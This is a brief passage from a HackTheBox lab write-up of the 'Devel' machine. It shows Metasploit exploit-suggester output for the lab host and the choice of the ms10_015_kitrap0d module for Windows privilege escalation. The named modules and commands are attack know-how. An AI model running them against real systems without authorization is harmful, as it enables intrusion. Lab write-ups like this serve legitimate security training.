HippoEug/HackTheBox/Devel.md

 [+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
 [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
 ```
+We could've used `meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true` as well.

 We'll try `exploit/windows/local/ms10_015_kitrap0d` on the meterpreter session, as we've used/seen this before and as a result more familiar with it.
 ```
 msf5 > use exploit/windows/local/ms10_015_kitrap0d